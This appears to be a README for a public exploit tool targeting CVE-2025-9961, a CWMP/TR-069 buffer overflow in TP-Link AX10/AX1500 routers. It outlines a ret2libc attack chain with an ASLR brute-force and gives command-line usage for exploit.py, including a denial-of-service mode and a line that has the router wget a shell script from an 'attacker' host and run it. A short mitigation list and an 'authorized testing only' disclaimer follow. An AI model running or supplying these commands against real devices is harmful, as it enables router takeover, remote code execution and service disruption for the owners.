Share
## https://sploitus.com/exploit?id=DC74F76F-F83D-554F-9667-A4CB90438005
# CVE-2025-9961

**TP-Link AX10/AX1500 CWMP Buffer Overflow RCE**

## Overview

Stack-based buffer overflow in CWMP (TR-069) leading to remote code execution.

| Field | Value |
|-------|-------|
| Product | TP-Link AX10, AX1500 |
| Affected | AX10  B["Malicious ACS"]
    B --> C["SetParameterValues"]
    C --> D["Stack Overflow"]
    D --> E["Overwrite PC"]
    E --> F["ret2libc"]
    F --> G["system()"]
    G --> H["RCE"]
```

## Technical Details

The vulnerability is in the `cwmp` process handling of `SetParameterValues` SOAP requests. Input is used to calculate buffer size without bounds checking.

**Exploitation:**
- Use ret2libc to call system()
- ASLR bypass via brute force
- Service restarts allow repeated attempts

## Usage

```bash
python exploit.py  --check-only

python exploit.py 192.168.0.1 --dos

python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"
```

## Parameters

| Flag | Description | Default |
|------|-------------|---------|
| `-p, --port` | CWMP port | 7547 |
| `-c, --command` | Command for RCE | none |
| `-t, --timeout` | Socket timeout | 10 |
| `--dos` | DoS mode only | off |
| `--check-only` | Check if vulnerable | off |

## Requirements

None (uses standard library)

## Mitigation

- Update to patched firmware
- Disable TR-069/CWMP
- Restrict port 7547 access

## Disclaimer

For authorized security testing only.